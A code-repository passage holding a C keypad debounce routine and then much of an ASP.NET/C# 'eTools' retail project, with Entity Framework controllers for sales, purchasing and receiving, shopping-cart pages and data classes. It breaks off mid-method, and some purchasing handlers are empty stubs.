unsigned char keypad[4][3] = {{'1','2','3'},
{'4','5','6'},
{'7','8','9'},
{'*','0','#'}};
void delay(){
unsigned short a;
for(a=0;a<100;a++);
}
char debounce(char linha, char coluna){
char count = 0;
char key_last = 0;
char key_now;
char key_valid;
porta0 = ~(1<<(7-linha));
while(count != bounce){
delay();
key_now = porta0 & (1<<coluna);
if(key_now == key_last){
count++;
}
else{
count = 0;
}
key_last = key_now;
}
key_valid = key_now;
return key_valid;
}
char key_detect(){
unsigned char linha = 0;
unsigned char coluna = 0;
for(linha=0;linha<4;linha++){
for(coluna=0;coluna<3;coluna++){
if(!debounce(linha,coluna)){
while(!debounce(linha,coluna));
return keypad[linha][coluna];
}
}
}
return 0;
}
/*
void main(){
while(1){
key_pressed = key_detect();
if(key_pressed=='6'||key_pressed=='5'){
LED = !LED;
}
}
}*/
| f18c2f29a946b9631003e66765ab27a35c7bfa74 | [
"Markdown",
"C"
] | 9 | C | juliomilani/pharmicros | 120cb585cec5f0038fedf3318dcd126bd9db44fb | 4f04f6c27e50af32077af2a0936e9890266490d4 |
refs/heads/main | <file_sep>namespace eTools.Data.Entities.Pocos
{
public class PurchaseOrdersList
{
public int StockItemID { get; set; }
public string Description { get; set; }
public int QuantityOnHand { get; set; }
public int ReOrderLevel { get; set; }
public int QuantityOnOrder { get; set; }
public int PurchaseOrderQuantity { get; set; }
public decimal PPrice { get; set; }
}
}
<file_sep>using eTools.Application.BLL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
public partial class Tasks_Staff : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (Request.IsAuthenticated)
{
if (User.IsInRole("Employees"))
{
OutstandingOrders.Visible = true;
}
else
{
MessageUserControl.ShowInfo("You must be logged into an employee account to access this page.");
OutstandingOrders.Visible = false;
}
}
else
{
Response.Redirect("~/Account/Login.aspx");
}
}
protected void CheckForException(object sender, ObjectDataSourceStatusEventArgs e)
{
MessageUserControl.HandleDataBoundException(e);
}
protected void ShowPurchaseOrders_SelectedIndexChanging(object sender, GridViewSelectEventArgs e)
{
OrderInfo.Visible = true;
OrderControls.Visible = true;
int index = e.NewSelectedIndex;
GridViewRow agrow = ShowPurchaseOrders.Rows[index];
int orderNumber = int.Parse(agrow.Cells[0].Text);
PONum.Text = agrow.Cells[0].Text;
Vendor.Text = agrow.Cells[2].Text;
Phone.Text = agrow.Cells[3].Text;
MessageUserControl.TryRun(() =>
{
ReceivingController sysmgr = new ReceivingController();
List<ViewPurchaseOrderItems> orderInfo = sysmgr.GetPurchaseOrderDetails(orderNumber);
ShowOrderDetails.DataSource = orderInfo;
ShowOrderDetails.DataBind();
});
}
protected void ReceiveOrder_Click(object sender, EventArgs e)
{
if (PONum.Text != "")
{
bool orderCompleted = true;
int orderNumber = int.Parse(PONum.Text);
ViewPurchaseOrderItems orderItem = null;
List<ViewPurchaseOrderItems> orderDetails = new List<ViewPurchaseOrderItems>();
MessageUserControl.TryRun(() =>
{
int tempInt = 0;
int count = 0;
foreach (GridViewRow arow in ShowOrderDetails.Rows)
{
orderItem = new ViewPurchaseOrderItems();
orderItem.ItemID = int.Parse((arow.FindControl("StockNum") as Label).Text);
orderItem.ItemDescription = (arow.FindControl("Description") as Label).Text;
orderItem.Ordered = int.Parse((arow.FindControl("QtyOrdered") as Label).Text);
if (string.IsNullOrEmpty((arow.FindControl("QtyReturned") as TextBox).Text))
{
orderItem.Returned = 0;
}
else
{
if (int.TryParse((arow.FindControl("QtyReturned") as TextBox).Text, out tempInt))
{
if (tempInt >= 0)
{
orderItem.Returned = tempInt;
count += tempInt;
}
else
{
throw new Exception("You must enter a postive integer value for returned items.");
}
}
else
{
throw new Exception("You must enter an integer value for returned items.");
}
}
if (string.IsNullOrEmpty((arow.FindControl("QtyReceived") as TextBox).Text))
{
orderItem.Received = 0;
}
else
{
if (int.TryParse((arow.FindControl("QtyReceived") as TextBox).Text, out tempInt))
{
if (tempInt >= 0)
{
orderItem.Received = tempInt;
count += tempInt;
}
else
{
throw new Exception("You must enter a postive integer value for received items.");
}
}
else
{
throw new Exception("You must enter an integer value for received items.");
}
}
if ((arow.FindControl("ReasonReturned") as TextBox).Text == "" && orderItem.Returned > 0)
{
throw new Exception("You must enter a reason for returned items.");
}
else
{
if (orderItem.Returned > 0)
{
orderItem.Reason = (arow.FindControl("ReasonReturned") as TextBox).Text;
}
}
if (orderItem.Received < int.Parse((arow.FindControl("QtyOutstanding") as Label).Text))
{
orderCompleted = false;
}
orderDetails.Add(orderItem);
}
if (count == 0)
{
throw new Exception("You cannot receive an empty order.");
}
ReceivingController sysmgr = new ReceivingController();
sysmgr.ReceivePurchaseOrder(orderNumber, orderDetails, orderCompleted);
PONum.Text = "";
Vendor.Text = "";
Phone.Text = "";
ShowOrderDetails.DataSource = null;
ShowOrderDetails.DataBind();
ShowPurchaseOrders.DataBind();
OrderInfo.Visible = false;
OrderControls.Visible = false;
}, "Purchase Order Receiving", "Purchase Order successfully received.");
}
else
{
MessageUserControl.ShowInfo("You must select a purchase order before receiving.");
}
}
protected void ForceClose_Click(object sender, EventArgs e)
{
if (PONum.Text != "")
{
int orderNumber = int.Parse(PONum.Text);
string reason = ReasonForceClosed.Text;
MessageUserControl.TryRun(() =>
{
if (reason == "")
{
throw new Exception("You must enter a reason for force closing.");
}
else
{
ReceivingController sysmgr = new ReceivingController();
sysmgr.ForceClosePurchaseOrder(orderNumber, reason);
PONum.Text = "";
Vendor.Text = "";
Phone.Text = "";
ReasonForceClosed.Text = "";
ShowOrderDetails.DataSource = null;
ShowOrderDetails.DataBind();
ShowPurchaseOrders.DataBind();
OrderInfo.Visible = false;
OrderControls.Visible = false;
}
}, "Purchase Order Receiving", "Purchase Order successfully closed.");
}
else
{
MessageUserControl.ShowInfo("You must select a purchase order before closing.");
}
}
}<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using eTools.Application.BLL;
using Microsoft.AspNet.Identity;
using eTools.Data.Entities;
using eTools.Data;
using System.Data;
public partial class Tasks_Default : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
}<file_sep>using Microsoft.AspNet.Identity.EntityFramework;
namespace eTools.Application.Security
{
public class ApplicationUser : IdentityUser
{
public int? EmployeeId { get; set; }
public string CustomerId { get; set; }
}
}
<file_sep>namespace eTools.Data.Entities.Pocos
{
public class ViewPurchaseOrderItems
{
public int ItemID { get; set; }
public string ItemDescription { get; set; }
public int Ordered { get; set; }
public int Outstanding { get; set; }
public int Received { get; set; }
public int Returned { get; set; }
public string Reason { get; set; }
}
}
<file_sep>namespace eTools.Data.Entities.Pocos
{
public class VendorList
{
public int VendorID { get; set; }
public string VendorName { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
public class EmployeeList
{
public int EmployeeID { get; set; }
public string EmployeeName { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Application.Security
{
internal static class SecurityRoles
{
public const string WebsiteAdmins = "WebsiteAdmins";
public const string Customers = "Customers";
public const string Employees = "Employees";
public static List<string> StartupSecurityRoles
{
get
{
List<string> value = new List<string>();
value.Add(WebsiteAdmins);
value.Add(Customers);
value.Add(Employees);
return value;
}
}
}
}
<file_sep>using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using eTools.Data.DAL;
using eTools.Data.Entities;
using System.ComponentModel;
using System.Security.Principal;
namespace eTools.Application.BLL
{
[DataObject]
public class SalesController
{
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<CategoryList> GetCategoryList()
{
using (var context = new eToolsContext())
{
var data = from item in context.Categories
select new CategoryList()
{
CategoryID = item.CategoryID,
CategoryDescription = item.Description,
ItemCount= item.StockItems.Count()
};
return data.ToList();
}
}
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<StockItem> GetStockItemList(int? categoryid)
{
using (var context = new eToolsContext())
{
var data = from item in context.StockItems
select item;
if (categoryid != 0)
{
data = from item in context.StockItems
where item.CategoryID == categoryid
select item;
}
return data.ToList();
}
}
public int GetOnlineCustomerIDByUserName(string username)
{
using (var context = new eToolsContext())
{
int result = (from customer in context.OnlineCustomers
where customer.UserName == username
select customer.OnlineCustomerID).Count();
return result;
}
}
public int GetShoppingCartByUserName(string username)
{
using (var context = new eToolsContext())
{
int result = (from customer in context.ShoppingCarts
where customer.OnlineCustomer.UserName == username
select customer.ShoppingCartID).Count();
return result;
}
}
public int GetShoppingCartID(string username)
{
using (var context = new eToolsContext())
{
int result = (from customer in context.ShoppingCarts
where customer.OnlineCustomer.UserName == username
select customer.ShoppingCartID).FirstOrDefault();
return result;
}
}
public int GetShoppingCartItemID(int onlineCustomerID)
{
using (var context = new eToolsContext())
{
int result = (from customer in context.ShoppingCarts
where customer.OnlineCustomerID == onlineCustomerID
select customer.ShoppingCartID).FirstOrDefault();
int result2 = (from cart in context.ShoppingCartItems
where cart.ShoppingCartID == result
select cart.ShoppingCartItemID).FirstOrDefault();
return result2;
}
}
public int FindCustomerID(string username)
{
using (var context = new eToolsContext())
{
int result = (from customer in context.OnlineCustomers
where customer.UserName == username
select customer.OnlineCustomerID).First();
return result;
}
}
public int AddOnlineCustomer(OnlineCustomer item)
{
using (var context = new eToolsContext())
{
var added = context.OnlineCustomers.Add(item);
context.SaveChanges();
return added.OnlineCustomerID;
}
}
public void AddShoppingCart(ShoppingCart item2)
{
using (var context = new eToolsContext())
{
// Add the item to the dbContext
var added = context.ShoppingCarts.Add(item2);
context.SaveChanges();
}
}
public void AddToShoppingCart(int stockitemid, string username, int quantity)
{
using (var context = new eToolsContext())
{
var result = from cus in context.OnlineCustomers
where cus.UserName == username
select new
{
id = cus.OnlineCustomerID,
cart = cus.ShoppingCarts.FirstOrDefault()
};
var result2 = from cart in result
where cart.id == cart.cart.OnlineCustomerID
select new
{
id = cart.id,
cartid = cart.cart.ShoppingCartID
};
var result3 = from quan in context.ShoppingCartItems
where quan.StockItemID == stockitemid && quan.ShoppingCartID == result2.FirstOrDefault().cartid
select new
{
quan = quan.Quantity
};
ShoppingCartItem item = new ShoppingCartItem();
item.ShoppingCartID = result2.FirstOrDefault().cartid;
item.StockItemID = stockitemid;
item.Quantity = quantity;
context.ShoppingCartItems.Add(item);
context.SaveChanges();
}
}
public void UpdateToShoppingCart(int stockitemid, int shoppingcartitemid, string username, int quantity)
{
using (var context = new eToolsContext())
{
int result = (from cart in context.ShoppingCartItems
where cart.ShoppingCart.OnlineCustomer.UserName == username
select cart.ShoppingCartID).First();
int result2 = (from cart in context.ShoppingCartItems
where cart.ShoppingCart.OnlineCustomer.UserName == username && cart.StockItemID == stockitemid
select cart.Quantity).First();
ShoppingCartItem item = new ShoppingCartItem();
item.ShoppingCartItemID = shoppingcartitemid;
item.StockItemID = stockitemid;
item.Quantity = quantity + result2;
item.ShoppingCartID = result;
context.Entry<ShoppingCartItem>(context.ShoppingCartItems.Attach(item)).State =
System.Data.Entity.EntityState.Modified;
context.SaveChanges();
}
}
public List<ShoppingCartItemList> GetShoppingCartItems(string userName)
{
using (var context = new eToolsContext())
{
var result = (from item in context.OnlineCustomers
where item.UserName == userName
select item).FirstOrDefault();
var result2 = (from x in context.ShoppingCarts
where x.OnlineCustomerID == result.OnlineCustomerID
select x).FirstOrDefault();
var result3 = from y in context.ShoppingCartItems
where y.ShoppingCartID == result2.ShoppingCartID
select new ShoppingCartItemList()
{
Quantity = y.Quantity,
StockItemID = y.StockItemID,
Description = y.StockItem.Description,
SellingPrice = y.StockItem.SellingPrice,
ItemTotal = y.Quantity * y.StockItem.SellingPrice,
ShoppingCartItemID = y.ShoppingCartItemID
};
return result3.ToList();
}
}
public int DeleteShoppingCartItem(int ShoppingCartItemID)
{
using (var context = new eToolsContext())
{
ShoppingCartItem cartItem = context.ShoppingCartItems.Find(ShoppingCartItemID);
context.ShoppingCartItems.Remove(cartItem);
return context.SaveChanges();
}
}
public int UpdateShoppingCartItem(int ShoppingCartItemID, int quantity)
{
using (var context = new eToolsContext())
{
ShoppingCartItem cartItem = context.ShoppingCartItems.Find(ShoppingCartItemID);
cartItem.Quantity = quantity;
var attached = context.ShoppingCartItems.Attach(cartItem);
context.Entry(attached).State = System.Data.Entity.EntityState.Modified;
return context.SaveChanges();
}
}
public decimal GetSubTotal(int ShoppingCartID)
{
decimal result2 = 0;
using (var context = new eToolsContext())
{
var resutl = (from a in context.ShoppingCartItems
where a.ShoppingCartID == ShoppingCartID
select a.Quantity * a.StockItem.SellingPrice).ToList();
foreach(var item in resutl)
{
result2 = result2 + item;
}
return result2;
}
}
public int GetCoupons(string value)
{
using (var context = new eToolsContext())
{
var result = (from x in context.Coupons
where x.CouponIDValue == value
select x.CouponDiscount).FirstOrDefault();
return result;
}
}
}
}
<file_sep>using Microsoft.AspNet.Identity;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using eTools.Application.BLL;
using eTools.Data.Entities.Pocos;
public partial class Tasks_ViewCart : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
string username = User.Identity.GetUserName();
if (!IsPostBack)
{
if (!string.IsNullOrEmpty(username))
{
ShoppingCartItemData();
}
else
{
}
}
}
public void ShoppingCartItemData()
{
string username = User.Identity.GetUserName();
SalesController controller = new SalesController();
List<ShoppingCartItemList> itemList = new List<ShoppingCartItemList>();
itemList = controller.GetShoppingCartItems(username);
CartItemReapter.DataSource = itemList;
CartItemReapter.DataBind();
int shoppingCardID = controller.GetShoppingCartID(username);
decimal subTotal = controller.GetSubTotal(shoppingCardID);
SubTotal.Text = subTotal.ToString();
}
protected void CartItemReapter_ItemCommand(object source, RepeaterCommandEventArgs e)
{
int ShoppingCartItemId = Convert.ToInt32(e.CommandArgument.ToString());
SalesController saleManager = new SalesController();
TextBox quantity = e.Item.FindControl("QuanityChange") as TextBox;
int counts = Convert.ToInt32(quantity.Text);
if (e.CommandName=="Remove")
{
MessageUserControl.TryRun(() =>
{
saleManager.DeleteShoppingCartItem(ShoppingCartItemId);
ShoppingCartItemData();
}, "Success", "Shopping cart item was deleted.");
}
else if(e.CommandName == "Update")
{
MessageUserControl.TryRun(() =>
{
saleManager.UpdateShoppingCartItem(ShoppingCartItemId, counts);
ShoppingCartItemData();
}, "Success", "Shopping cart item was Updated.");
}
}
}<file_sep>using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
public class PurchaseOrderStats
{
public int ID { get; set; }
public string Name { get; set; }
public string Location { get; set; }
public string Phone { get; set; }
public decimal Subtotal { get; set; }
public decimal GST { get; set; }
public decimal Total { get; set; }
}
}
<file_sep>using Microsoft.AspNet.Identity.EntityFramework;
namespace eTools.Application.Security
{
internal class ApplicationDbContext : IdentityDbContext<ApplicationUser>
{
public ApplicationDbContext()
: base("DefaultConnection")
{
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
public class CategoryList
{
public int CategoryID { get; set; }
public string CategoryDescription { get; set; }
public int ItemCount { get; set; }
}
}
<file_sep>using eTools.Data.DAL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Application.BLL
{
[DataObject]
public class ReceivingController
{
public List<ViewPurchaseOrder> GetOpenPurchaseOrders()
{
using (var context = new eToolsContext())
{
var results = from aPurchaseOrder in context.PurchaseOrders
where aPurchaseOrder.Closed.Equals(false)
&& aPurchaseOrder.OrderDate.HasValue
orderby aPurchaseOrder.OrderDate
select new ViewPurchaseOrder()
{
OrderNumber = aPurchaseOrder.PurchaseOrderID,
DateOrdered = aPurchaseOrder.OrderDate,
Name = aPurchaseOrder.Vendor.VendorName,
ContactPhone = aPurchaseOrder.Vendor.Phone
};
return results.ToList();
}
}
public List<ViewPurchaseOrderItems> GetPurchaseOrderDetails(int purchaseOrderID)
{
using (var context = new eToolsContext())
{
var result = from item in context.PurchaseOrderDetails
where item.PurchaseOrderID.Equals(purchaseOrderID)
select new ViewPurchaseOrderItems()
{
ItemID = item.StockItemID,
ItemDescription = item.StockItem.Description,
Ordered = item.Quantity,
//Outstanding = item.Quantity - item.ReceiveOrderDetails.Select(receive => receive.QuantityReceived).DefaultIfEmpty(0).Sum(),
Outstanding = item.StockItem.QuantityOnOrder,
Received = 0,
Returned = 0,
Reason = ""
};
return result.ToList();
}
}
public void ReceivePurchaseOrder(int orderNumber, List<ViewPurchaseOrderItems> orderDetails, bool orderCompleted)
{
using (var context = new eToolsContext())
{
PurchaseOrder purchaseOrder = context.PurchaseOrders.Find(orderNumber);
purchaseOrder.Closed = orderCompleted;
context.Entry(purchaseOrder).Property("Closed").IsModified = true;
ReceiveOrder receiveOrder = new ReceiveOrder();
receiveOrder.PurchaseOrderID = orderNumber;
receiveOrder.ReceiveDate = DateTime.Now;
context.ReceiveOrders.Add(receiveOrder);
StockItem stockItem = null;
PurchaseOrderDetail purchaseOrderDetail = null;
ReceiveOrderDetail receiveOrderDetail = null;
ReturnedOrderDetail returnedOrderDetail = null;
foreach (ViewPurchaseOrderItems item in orderDetails)
{
purchaseOrderDetail = purchaseOrder.PurchaseOrderDetails.Where(order => order.StockItemID == item.ItemID).SingleOrDefault();
if (item.Received > 0)
{
receiveOrderDetail = new ReceiveOrderDetail();
receiveOrderDetail.ReceiveOrderID = receiveOrder.ReceiveOrderID;
receiveOrderDetail.PurchaseOrderDetailID = purchaseOrderDetail.PurchaseOrderDetailID;
receiveOrderDetail.QuantityReceived = item.Received;
context.ReceiveOrderDetails.Add(receiveOrderDetail);
stockItem = context.StockItems.Find(item.ItemID);
stockItem.QuantityOnHand += item.Received;
context.Entry(stockItem).Property("QuantityOnHand").IsModified = true;
if (item.Received > stockItem.QuantityOnOrder)
{
stockItem.QuantityOnOrder = 0;
}
else
{
stockItem.QuantityOnOrder -= item.Received;
}
context.Entry(stockItem).Property("QuantityOnOrder").IsModified = true;
}
if (item.Returned > 0)
{
returnedOrderDetail = new ReturnedOrderDetail();
returnedOrderDetail.ReceiveOrderID = receiveOrder.ReceiveOrderID;
returnedOrderDetail.PurchaseOrderDetailID = purchaseOrderDetail.PurchaseOrderDetailID;
returnedOrderDetail.ItemDescription = stockItem.Description;
returnedOrderDetail.Quantity = item.Returned;
returnedOrderDetail.Reason = item.Reason;
context.ReturnedOrderDetails.Add(returnedOrderDetail);
}
}
context.SaveChanges();
}
}
public void ForceClosePurchaseOrder(int orderNumber, string reason)
{
using (var context = new eToolsContext())
{
PurchaseOrder purchaseOrder = context.PurchaseOrders.Find(orderNumber);
purchaseOrder.Notes = reason;
context.Entry(purchaseOrder).Property("Notes").IsModified = true;
purchaseOrder.Closed = true;
context.Entry(purchaseOrder).Property("Closed").IsModified = true;
StockItem stockItem = null;
foreach (PurchaseOrderDetail item in purchaseOrder.PurchaseOrderDetails)
{
stockItem = context.StockItems.Find(item.StockItemID);
//stockItem.QuantityOnOrder -= item.Quantity - item.ReceiveOrderDetails.Select(receive => receive.QuantityReceived).DefaultIfEmpty(0).Sum();
stockItem.QuantityOnOrder = 0;
context.Entry(stockItem).Property("QuantityOnOrder").IsModified = true;
}
context.SaveChanges();
}
}
}
}<file_sep># ETools
.net
<file_sep>using eTools.Data.DAL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
namespace eTools.Application.BLL
{
[DataObject]
public class PurchasingController
{
#region Lists
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<VendorList> ListVendors()
{
using (var context = new eToolsContext())
{
var ven = from buyer in context.PurchaseOrders
where buyer.OrderDate == null
orderby buyer.Vendor.VendorName
select new VendorList
{
VendorName = buyer.Vendor.VendorName+ "- " + buyer.PurchaseOrderID,
VendorID = buyer.VendorID
};
return ven.ToList();
}
}
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<EmployeeList> ListEmployees()
{
using (eToolsContext context = new eToolsContext())
{
var emp = from buyer in context.Employees
orderby buyer.LastName ascending
select new EmployeeList
{
EmployeeName = buyer.LastName + ", " + buyer.FirstName,
EmployeeID = buyer.EmployeeID
};
return emp.ToList();
}
}
#endregion
#region Get's
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<OrderInfo> ListOrderInfo(int vendorid)
{
using (var context = new eToolsContext())
{
var info = from form in context.PurchaseOrderDetails
where form.PurchaseOrder.VendorID == vendorid
where form.Quantity > 0
select new OrderInfo
{
ItemID = form.StockItem.StockItemID,
Desc = form.StockItem.Description,
QOH = form.StockItem.QuantityOnHand,
ROL = form.StockItem.ReOrderLevel,
QOO = form.StockItem.QuantityOnOrder,
Buffer = form.StockItem.QuantityOnHand - form.StockItem.ReOrderLevel,
PurchasePrice = form.PurchasePrice
};
return info.ToList();
}
}
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<PurchaseOrdersList> ListPurchaseOrder(int vendorid)
{
using (var context = new eToolsContext())
{
var result = from data in context.PurchaseOrderDetails
where data.PurchaseOrder.VendorID == vendorid
where data.StockItem.StockItemID == data.StockItemID
where data.Quantity > 0
select new PurchaseOrdersList()
{
StockItemID = data.StockItem.StockItemID,
Description = data.StockItem.Description,
QuantityOnHand = data.StockItem.QuantityOnHand,
ReOrderLevel = data.StockItem.ReOrderLevel,
QuantityOnOrder = data.StockItem.QuantityOnOrder,
PurchaseOrderQuantity = data.Quantity,
PPrice = data.StockItem.PurchasePrice
};
return result.ToList();
}
}
[DataObjectMethod(DataObjectMethodType.Select, false)]
public PurchaseOrderStats GetPurchaseOrderInfo(int vendorid)
{
PurchaseOrderStats results = null;
using (var context = new eToolsContext())
{
var theOrder = (from x in context.PurchaseOrders
where x.VendorID == vendorid
select x).FirstOrDefault();
if (theOrder != null)
{
results = new PurchaseOrderStats()
{
ID = theOrder.PurchaseOrderID,
Location = theOrder.Vendor.City,
Name = theOrder.Vendor.VendorName,
Phone = theOrder.Vendor.Phone,
GST = theOrder.TaxAmount,
Subtotal = theOrder.SubTotal,
Total = theOrder.SubTotal + theOrder.TaxAmount
};
}
return results;
}
}
#endregion
#region PO CRUD
[DataObjectMethod(DataObjectMethodType.Insert, false)]
public void StartOrder (PurchaseOrder item)
{
using (var context = new eToolsContext())
{
var added = context.PurchaseOrders.Add(item);
context.SaveChanges();
}
}
[DataObjectMethod(DataObjectMethodType.Delete, false)]
public void DeleteOrder (PurchaseOrder item)
{
using (var context = new eToolsContext())
{
var existing = context.PurchaseOrders.Find(item.PurchaseOrderID);
context.PurchaseOrders.Remove(existing);
context.SaveChanges();
}
}
[DataObjectMethod(DataObjectMethodType.Update, false)]
public void UpdateOrder (PurchaseOrder item)
{
using(eToolsContext context = new eToolsContext())
{
var attached = context.PurchaseOrders.Attach(item);
var existing = context.Entry(attached);
existing.State = System.Data.Entity.EntityState.Modified;
context.SaveChanges();
}
}
#endregion
#region Vendor
[DataObjectMethod(DataObjectMethodType.Delete, false)]
public void DeleteItem(PurchaseOrderDetail item)
{
using (var context = new eToolsContext())
{
var existing = context.StockItems.Find(item.StockItemID);
context.StockItems.Remove(existing);
context.SaveChanges();
}
}
#endregion
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
public class OrderInfo
{
public int ItemID { get; set; }
public string Desc { get; set; }
public int QOH { get; set; }
public int ROL { get; set; }
public int QOO { get; set; }
public int Buffer { get; set; }
public decimal PurchasePrice { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using eTools.Application.BLL;
using Microsoft.AspNet.Identity;
using eTools.Data.Entities;
using eTools.Data;
using System.Data;
public partial class Tasks_ViewCart : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (!Page.IsPostBack)
{
SalesController controller = new SalesController();
int catId = 0;
ItemReapter.DataSource = controller.GetStockItemList(catId);
ItemReapter.DataBind();
}
}
protected void btn_category_Command(object sender, CommandEventArgs e)
{
int catId = int.Parse(e.CommandArgument.ToString());
SalesController controller = new SalesController();
ItemReapter.DataSource = null;
ItemReapter.DataSource = controller.GetStockItemList(catId);
ItemReapter.DataBind();
}
protected void All_Click(object sender, EventArgs e)
{
SalesController controller = new SalesController();
int id = 0;
ItemReapter.DataSource = null;
ItemReapter.DataSource = controller.GetStockItemList(id);
ItemReapter.DataBind();
}
protected void ItemReapter_ItemCommand(object source, RepeaterCommandEventArgs e)
{
if (e.CommandName == "Add")
{
//int i;
int itemCode = Convert.ToInt32(e.CommandArgument.ToString());
string username = User.Identity.GetUserName();
DateTime Today = DateTime.Today;
TextBox quantity = e.Item.FindControl("Quantity") as TextBox;
int counts = Convert.ToInt32(quantity.Text);
OnlineCustomer newCustomer = new OnlineCustomer();
SalesController sysmgr = new SalesController();
if (sysmgr.GetOnlineCustomerIDByUserName(username) == 0)
{
newCustomer.UserName = username;
newCustomer.CreatedOn = Today;
int onlineCustomerId = sysmgr.AddOnlineCustomer(newCustomer);
}
if (sysmgr.GetShoppingCartByUserName(username) == 0)
{
ShoppingCart newShoppingCart = new ShoppingCart();
newShoppingCart.OnlineCustomerID = sysmgr.FindCustomerID(username);
newShoppingCart.CreatedOn = Today;
sysmgr.AddShoppingCart(newShoppingCart);
}
MessageUserControl.TryRun(() =>
{
sysmgr.AddToShoppingCart(itemCode, username, counts);
Button add = e.Item.FindControl("Add") as Button;
LinkButton update = e.Item.FindControl("Update") as LinkButton;
Label itemCount = e.Item.FindControl("itemCount") as Label;
add.Visible = false;
update.Visible = true;
itemCount.Text = quantity.Text;
}, "Success", "New Item has been added to your shopping cart.");
}
if (e.CommandName == "Update")
{
if (int.Parse((e.Item.FindControl("Quantity") as TextBox).Text) < 1)
{
MessageUserControl.ShowInfo("Quantity should greater than 0.");
}
else
{
SalesController sysmgr = new SalesController();
string username = User.Identity.GetUserName();
int quantity = int.Parse((e.Item.FindControl("Quantity") as TextBox).Text);
int itemCode = Convert.ToInt32(e.CommandArgument.ToString());
int OnlineCustomerID = sysmgr.FindCustomerID(username);
int shoppingCartItemID = sysmgr.GetShoppingCartItemID(OnlineCustomerID);
MessageUserControl.TryRun(() =>
{
sysmgr.UpdateToShoppingCart(itemCode, shoppingCartItemID, username, quantity);
Label itemCount = e.Item.FindControl("itemCount") as Label;
itemCount.Text = (int.Parse(itemCount.Text) + quantity).ToString();
}, "Success", "Item quantity was updated");
}
}
}
}<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
public class ShoppingCartItemList
{
public string Description { get; set; }
public int Quantity { get; set; }
public decimal SellingPrice { get; set; }
public decimal ItemTotal { get; set; }
public int StockItemID { get; set; }
public int ShoppingCartItemID { get; set; }
}
}
<file_sep>using eTools.Application.BLL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
public partial class Tasks_Product : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
protected void CheckForException(object sender, ObjectDataSourceStatusEventArgs e)
{
MessageUserControl.HandleDataBoundException(e);
}
protected void PreviewButton_Click(object sender, EventArgs e)
{
}
protected void DeleteOrderButton_Click(object sender, EventArgs e)
{
}
protected void PlaceOrderButton_Click(object sender, EventArgs e)
{
}
protected void ClearButton_Click(object sender, EventArgs e)
{
Response.Redirect("~/Tasks/Purchasing.aspx");
}
protected void POrderResultsList_RowDeleting(object sender, GridViewDeleteEventArgs e)
{
}
protected void POrderResultsList_SelectedIndexChanging(object sender, GridViewSelectEventArgs e)
{
int index = e.NewSelectedIndex;
GridViewRow row = POrderResultsList.Rows[index];
int itemID = int.Parse(row.Cells[0].Text);
Label stockLabel = row.FindControl("StockNumb") as Label;
PurchaseOrdersList vendoritem = new PurchaseOrdersList();
List<PurchaseOrdersList> existing = OtherItemsGridview(OtherItemsView);
existing.Add(vendoritem);
OtherItemsView.DataSource = existing;
OtherItemsView.DataBind();
List<PurchaseOrdersList> existingData = new List<PurchaseOrdersList>();
foreach (GridViewRow theRow in OtherItemsView.Rows)
{
itemID = int.Parse(theRow.Cells[0].Text);
existingData.Add(new PurchaseOrdersList());
}
existingData.RemoveAt(index);
OtherItemsView.DataSource = existingData;
OtherItemsView.DataBind();
}
private List<PurchaseOrdersList> OtherItemsGridview(GridView gv)
{
List<PurchaseOrdersList> lists = new List<PurchaseOrdersList>();
foreach (GridViewRow row in gv.Rows)
{
int stockid = int.Parse(row.Cells[0].Text);
string desc = row.Cells[1].Text;
int qoh = int.Parse(row.Cells[2].Text);
int rol = int.Parse(row.Cells[3].Text);
int qoo = int.Parse(row.Cells[4].Text);
int pqty = int.Parse(row.Cells[5].Text);
decimal pprice = int.Parse(row.Cells[6].Text);
// Now I can create a ship object
PurchaseOrdersList frontLine = new PurchaseOrdersList();
// Add it to my list
lists.Add(frontLine);
}
return lists;
}
protected void OtherItemsView_SelectedIndexChanging(object sender, GridViewSelectEventArgs e)
{
int index = e.NewSelectedIndex;
